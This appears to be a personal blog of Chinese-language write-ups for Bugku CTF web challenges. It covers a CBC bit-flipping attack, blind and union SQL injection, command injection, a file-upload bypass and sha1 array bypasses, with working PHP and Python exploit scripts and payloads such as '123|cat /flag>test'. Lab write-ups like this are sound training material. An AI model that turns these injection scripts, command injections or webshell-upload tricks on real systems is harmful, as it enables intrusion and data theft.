bugku-web-CBC

2021-08-11

按流程：随便输——>提示admin——>输admin——>发现不行

扫目录，发现swp备份文件
用linux打开（vim -r .index.php.swp）

<?php
define("SECRET_KEY", file_get_contents('/root/key'));
define("METHOD", "aes-128-cbc");
session_start();

function get_random_iv(){	//随机生成16位初始化向量
    $random_iv='';
    for($i=0;$i<16;$i++){
        $random_iv.=chr(rand(1,255));
    }
    return $random_iv;
}

#第一个执行的方法
function login($info){
    $iv = get_random_iv();
    $plain = serialize($info);	//明文序列化
    $cipher = openssl_encrypt($plain, METHOD, SECRET_KEY, OPENSSL_RAW_DATA, $iv);	//加密
	//options：以下标记的按位或： OPENSSL_RAW_DATA 原生数据，对应数字1，不进行 base64 编码。OPENSSL_ZERO_PADDING 数据进行 base64 编码再返回，对应数字0。 
    $_SESSION['username'] = $info['username'];	//注册SESSION全局变量
	//以下两行设置cookie
    setcookie("iv", base64_encode($iv));
    setcookie("cipher", base64_encode($cipher));
}

function check_login(){
    if(isset($_COOKIE['cipher']) && isset($_COOKIE['iv'])){
        $cipher = base64_decode($_COOKIE['cipher']);
        $iv = base64_decode($_COOKIE["iv"]);
        if($plain = openssl_decrypt($cipher, METHOD, SECRET_KEY, OPENSSL_RAW_DATA, $iv)){
            $info = unserialize($plain) or die("<p>base64_decode('".base64_encode($plain)."') can't unserialize</p>");
            $_SESSION['username'] = $info['username'];
        }else{
            die("ERROR!");
        }
    }
}

#第二个执行，检测用户名为admin时，打印flag
function show_homepage(){
    if ($_SESSION["username"]==='admin'){
        echo '<p>Hello admin</p>';
        echo '<p>Flag is $flag</p>';
    }else{
        echo '<p>hello '.$_SESSION['username'].'</p>';
        echo '<p>Only admin can see flag</p>';
    }
    echo '<p><a href="loginout.php">Log out</a></p>';
}

if(isset($_POST['username']) && isset($_POST['password'])){
    $username = (string)$_POST['username'];
    $password = (string)$_POST['password'];
    if($username === 'admin'){
        exit('<p>admin are not allowed to login</p>');
    }else{
        $info = array('username'=>$username,'password'=>$password);
        login($info);
        show_homepage();
    }
}else{
    if(isset($_SESSION["username"])){
        check_login();
        show_homepage();
    }else{
        echo '<body class="login-body">
                <div id="wrapper">
                    <div class="user-icon"></div>
                    <div class="pass-icon"></div>
                    <form name="login-form" class="login-form" action="" method="post">
                        <div class="header">
                        <h1>Login Form</h1>
                        <span>Fill out the form below to login to my super awesome imaginary control panel.</span>
                        </div>
                        <div class="content">
                        <input name="username" type="text" class="input username" value="Username" onfocus="this.value=\'\'" />
                        <input name="password" type="password" class="input password" value="Password" onfocus="this.value=\'\'" />
                        </div>

然后代码审计：
真做不出来，主要参考的这篇文章https://blog.csdn.net/u013577244/article/details/86310881

解题：

<?php
header("Content-Type: text/html;charset=utf-8");
	#计算cipher
	/*
	明文1：a:2:{s:8:"userna		//r
	明文2：me";s:5:"admil";		//l字母在第14个字节
	明文3：s:8:"password";s
	明文4：:3:"123";}
	*/
	$cipher = base64_decode(urldecode('f0csYAAWDy%2FGlSsvWLr6NlCBad4p2U%2BXm2Rr2X07iytKd4r8V5tbO7%2FcxIib96eRDGUOMQclQgvxw2SZXOobWQ%3D%3D'));
	$temp = $cipher;
	/*
	设密文1[13]=A,	解密(密文2)[13]=B,	明文2[13]=C,	
	将A修改为A ^ C,则:
	A ^ B = A ^ C ^ B = B ^ B = 0 = C
	*/
	//						A				  C			 X
	$cipher[13] = chr(ord($cipher[13]) ^ ord('l') ^ ord('n'));
	echo urlencode(base64_encode($cipher));
	?>

<?php
	#计算iv
	$res = base64_decode('yeiydaYLG5RNzOPWaQgOkG1lIjtzOjU6ImFkbWluIjtzOjg6InBhc3N3b3JkIjtzOjM6IjEyMyI7fQ==');	//这里放burp放回的base64数据
	$iv = base64_decode(urldecode('TD9FI%2FvbrZn%2FSjbSD9bfSQ%3D%3D')); //这里放cookie中的iv
	$plaintext = 'a:2:{s:8:"userna';
	$new_iv = '';
	for ($i = 0; $i < 16; $i ++){
		$new_iv = $new_iv . chr(ord($iv[$i]) ^ ord($res[$i]) ^ ord($plaintext[$i]));
	}
	echo urlencode(base64_encode($new_iv));
?>

得到flag

展开全文 >>

bugku-web-sql注入

2021-08-11

方法和都过滤了（web36）差不多

这次用username=admin'^(ascii(mid((password)from(§1§)))<>ascii('§4§'))#&password=123在bp上爆破，网站一如既往的容易挂

上脚本：

#!-*-coding:utf-8-*-


import requests

url = "http://114.67.246.176:16405/index.php"

password = ""
for i in range(1, 100):
    for j in '0123456789abcdefghijklmnopqrstuvwxyz':

        #print(i);

        payload = "admin'^(ascii(mid((password)from(" + str(i) + ")))<>ascii('" + j + "'))#"
        #print(payload)

        #print(j)
        data = {
        'username': payload,
        'password': '123'
        }
        r = requests.post(url=url, data=data)
        #print(r.content)

        #print(r.text)

        if "<p align='center'>password error!</p>" in r.text:
            password += j
            print(password)
            break
print("密码是"+password)

md5解出来还是bugkuctf，直接拿flag

展开全文 >>

bugku-web-login2

2021-08-11

sqlmap扫目录可以注入，但是内容为空
所以不存在猜密码的选项了

用repeater发送后看到有个tip 是一串base64加密的字符，解密后明文：

审计后发现可以构造一个不存在的用户进行登录，查询的密码要和md5加密后的一致，构造payload：
username=admin’ union select 1,md5(123)#&password=123

进入shell界面

用|绕过
传入123|ls没有回显
采用写入文件二次返回的方法查看结果

1	123\|ls ../../../>test

然后访问http://114.67.246.176:13110/test

cat出flag
123|cat /flag>test

展开全文 >>

bugku-web-都过滤了

2021-08-11

这道题本来有个DS_Store源码泄露漏洞，不过后来被修了

现在只能通过sql注入

另外，如果这道题你手注爆破的思路没有问题，但是怎么都爆破不出来……不要怀疑自己，就是平台的锅，因为这玩意动不动就挂掉，根本就爆破不出来

看提示没有过滤^和-，可以用异或注入

可以自己传admin'-(ascii(mid((passwd)from(" + str(i) + ")))=" + str(ord(j)) + ")-'改变j的值测试一下，会发现只有一个的回显是username error,其余都是password error

然后跑脚本

#!-*-coding:utf-8-*-


import requests

url = "http://114.67.246.176:15484/login.php"

password = ""
for i in range(1, 100):
    payload1 = "admin'^(length(passwd)=" + str(i) + ")^'"
    data = {
        'uname': payload1,
        'passwd': '123'
    }
    r = requests.post(url=url, data=data)
    if "username error!!@_@" in r.text:
        print("密码的长度是"+str(i))
        break
for i in range(1, 33):
    for j in '0123456789abcdefghijklmnopqrstuvwxyz':
        payload = "admin'-(ascii(mid((passwd)from(" + str(i) + ")))=" + str(ord(j)) + ")-'"
        data = {
        'uname': payload,
        'passwd': '123'
        }
        r = requests.post(url=url, data=data)
        #print(r.content)
        if "username error!!@_@" in r.text:
            password += j
            print(password)
            break
print("密码是"+password)

得到一串md5，解码出来是bugkuctf,猜出密码是admin，直接登录

shell界面上，发现过滤了空格，读取权限也不全，flag又不在当前文件夹，只能盲猜flag在根目录
所以cat<>/flag得到flag

展开全文 >>

bugku-web-需要管理员

2021-08-11

文字游戏题，没什么意思，评论区大佬说的很有道理：就考了一个目录扫描

扫描出/robots.txt

打开发现/resusl.php

说什么我的ip被记录都是吓人的，其实根本不需要改xff
然后就是根据标题的“管理员”猜出password是admin，然后x=admin出答案，没意思

展开全文 >>

bugku-web-文件包含

2021-08-11

不知道出题人是不是来搞笑的，直接file=/flag就出来了

展开全文 >>

bugku-web-文件上传

2021-08-11

这道题只能靠猜，因为只有长传木马成功才能看到源码

源码如下：

<?php

global_filter();
if ((stripos($_FILES["file"]["type"],'image')!== False) && ($_FILES["file"]["size"] < 10*1024*1024)){
	if ($_FILES["file"]["error"] == 0){
		$file_ext =  substr($_FILES["file"]["name"], strrpos($_FILES["file"]["name"], '.')+1);
        $file_ext = strtolower($file_ext);
        $allowexts = array('jpg','gif','jpeg','bmp','php4');
        if(!in_array($file_ext,$allowexts)){
            die("give me a image file not a php");
        }
		$_FILES["file"]["name"]="bugku".date('dHis')."_".rand(1000,9999).".".$file_ext;

	    if (file_exists("upload/" . $_FILES["file"]["name"])){
	    	echo $_FILES["file"]["name"] . " already exists. <br />";
	    }
	    else{
	    	if (!file_exists('./upload/')){
	    		mkdir ("./upload/");
                system("chmod 777 /var/www/html/upload");
	    	}
	    	move_uploaded_file($_FILES["file"]["tmp_name"],"upload/" . $_FILES["file"]["name"]);
                echo "Upload Success<br>";
                $filepath = "upload/" . $_FILES["file"]["name"];
	      	echo "Stored in: " ."<a href='" . $filepath . "' target='_blank'>" . $filepath . "<br />";
	    }
	}
}
else{
	if($_FILES["file"]["size"] > 0){
		echo "You was catched! :) <br />";
	}
}
?>

因此使用burp抓包后的改动为：
Content-Type: multipart/form-data;
multipart中的部分字母改成大写的。

文件的的Content-Type: application/octet-stream，改成image/jpeg

文件后缀名改成php4

连上蚁剑，得到flag

展开全文 >>

bugku-web-decrypt

2021-08-10

提示是一串字符，base64解码发现解不出来东西

下载附件发现是一个函数，貌似是base64产生的方法，所以只要逆序产出就行

写一个python脚本就好(第一次做的时候写的脚本，直接贴上来了)

import base64
import hashlib
test_str = 'hello world!'
# 编码
#encode_str = base64.encodebytes(test_str.encode('utf8'))  # b'aGVsbG8gd29ybGQh\n'
#print(encode_str.decode())  # 默认以utf8解码，结果 aGVsbG8gd29ybGQh
# 解码
encode_str='fR4aHWwuFCYYVydFRxMqHhhCKBseH1dbFygrRxIWJ1UYFhotFjA='.encode('utf8')
decode_str = base64.decodebytes(encode_str)  # b'hello world!'
print(decode_str.decode())  # 默认以utf8解码，结果 hello world!



a='ISCC'
m = hashlib.md5()
m.update(a.encode('utf-8'))
print(m.hexdigest())
len1=len(decode_str.decode())
print(len1)
str10=m.hexdigest()
x=0
i=1
char1=''
while(i<=32):
    if x==len:
        x=0
    char1+=str10[x]
    x+=1
    i+=1
i=1
x=0
while(i<=6):
    if x==len:
        x=0
    char1+=str10[x]
    x+=1
    i+=1
print(char1)

str1=decode_str.decode()

a=range(38)

d=''

for i in a:
    b=ord(str1[i])
    c=ord(char1[i])
    if((b-c>=48 and b-c<=57) or (b-c>=97 and b-c<=122)):
        e=b-c
        d+=chr(e)
    else:
        e=b+128-c
        d+=chr(e)

print(d)


#48-57
#97-122

得到flag（我的脚本写的不太好，前面的Flag:会变形，自己换一下就行）

展开全文 >>

bugku-web-点login咋没反应

2021-08-10

查看源代码，发现admin.css有个提示

输入后发现源码

反序化验证，自己写个php：

1
2
3

<?php
$KEY='ctf.bugku.com';
echo serialize($KEY);

得到s:13:"ctf.bugku.com";
然后加到cookie里就行

展开全文 >>

bugku-web-各种绕过哟

2021-08-10

打开以后是php代码：

<?php
highlight_file('flag.php');
$_GET['id'] = urldecode($_GET['id']);
$flag = 'flag{xxxxxxxxxxxxxxxxxx}';
if (isset($_GET['uname']) and isset($_POST['passwd'])) {
    if ($_GET['uname'] == $_POST['passwd'])

        print 'passwd can not be uname.';

    else if (sha1($_GET['uname']) === sha1($_POST['passwd'])&($_GET['id']=='margin'))

        die('Flag: '.$flag);

    else

        print 'sorry!';

}
?>

参考前面的md5撞库——前女友（web24）

这里也可以用数组绕过：?uname[]=1&id=margin
post：passwd[]=2
得到flag

我一开始也想尝试sha1撞库，虽然有是有，但是hash能达到撞库级别的都是非常庞大的数据，没法通过url来传，所以只能用数组了。

展开全文 >>